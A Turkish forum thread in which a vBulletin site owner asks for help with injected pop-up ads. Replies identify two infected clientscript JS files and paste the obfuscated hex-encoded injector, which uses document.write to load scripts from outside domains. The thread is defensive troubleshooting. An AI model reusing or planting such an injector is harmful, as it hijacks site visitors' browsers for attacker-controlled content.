arkadaşlar vbulletin 3.8.5 web sitemde deleton diye reklam çıkıyor sanırım sitede virüs var bunun yüzünden googleden az hit geliyor ben sitede kullandığım tüm reklam kodlarını kaldırdım ama siteye girip herhangi bir konuya tıklandığında 2. sekme otomatik açılıyor ve reklam çıkıyor bu 3 aydır böyle devam ediyor site www.cepstar.net ustalar inceleyip yardımcı olurmusunuz
Yaptığım işlemler
1. Tüm eklentileri sildim düzelmedi geri yükledim
2. Cpanelden virüs taraması yaptım 1 tane virüs buldu sildim ama düzelmedi
3. Sitedeki tüm reklam kodlarını kaldırdım
4. Sitedeki tüm temaları kaldırdım sadece 1 tane bıraktım
5. 9 ay önceki eski sql yedeğini attım
Ama banamısın demedi bu sorunu nasıl çözebilirim yardımcı olabilirmisiniz
vbulletin deleton virüsü ile başım dertte
4
●130
- 18-03-2018, 02:46:40Bir tanıtım yazısı yazarsan söyliyim çözümü

Şaka tabiki de tanıtım yazısı
Bu iki js dosyana şifreleyip kod koymuşlar
http://www.cepstar.net/clientscript/...read_marker.js
http://www.cepstar.net/clientscript/vbulletin_menu.js - 18-03-2018, 03:07:54js dosyalarınıza bulaşmış. Vbulletin dosyalarınızı yenileyin özellikle http://www.cepstar.net//clientscript/vbulletin_menu.js ve http://www.cepstar.net//clientscript...read_marker.js js dosyalarını yenileyin.
Görünen virüs yazılımı
Known javascript malware. Details: http://labs.sucuri.net/db/malware/ma...obfuscator?1.2 var _0x33b3=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\ x22\x2F\x2F\x77\x6F\x72\x64\x63\x2E\x67\x61\x2F\x6 9\x69\x6C\x6C\x69\x6F\x69\x64\x22\x3E\x3C\x2F\x73\ x63\x72\x69\x70\x74\x3E\x3C\x73\x63\x72\x69\x70\x7 4\x20\x73\x72\x63\x3D\x22\x2F\x2F\x6D\x77\x6F\x72\ x2E\x67\x71\x2F\x69\x6F\x65\x66\x6A\x6A\x65\x69\x2 2\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x 72\x69\x74\x65"];var _0x3ecb=[_0x33b3[0],_0x33b3[1]];var _0x5bf0=[_0x3ecb[0],_0x3ecb[1]];var _0x9203=[_0x5bf0[0],_0x5bf0[1]];var _0xab61=[_0x9203[0],_0x9203[1]];document[_0xab61[1]](_0xab61[0]) - 18-03-2018, 07:59:16saolun ustalar ama ben ftp de bu 2 dosyayı bulamadım hangi konumda duruyorlar biliyormusunuz birde dün akşam eklenti falan uğraşırken ana menü www.cepstar.net/index.php diye açılıyor bunu nasıl düzeltebilirim veya bana bir zararı varmı
ustalar saolun dosyaları buldum ve sildim sizin yazdıklarınıza extra global.js yide sildim o dosyaların yenisini koymadım öyle sildim şimdi hiç yoklar bir zararı olurmu site düzeldi füze gibi açılıyor reklam çıkmıyor bu virüs tekrar gelirmi benim pc de virüs var biliyorum ben ftp yi açmıştım oradan bulaştı diye düşünüyorum birde ben dün akşam vb seo zoint seo bunları sildim zararı olur diye okudum çünki 8 yıllık sitemin hiti çok az hiti ne yaptımsa arttıramadım - 18-03-2018, 17:16:05Tekrarlanmaması için ücretli destek düşünürseniz konumu inceleyebilirsiniz.
https://www.r10.net/site-guvenligi-saldirilar/1744415-internet-siteniz-guvende-mi-hack-lendiniz-mi-sakin-olun-ve-yavasca-iceri-girin-post1073059744.html
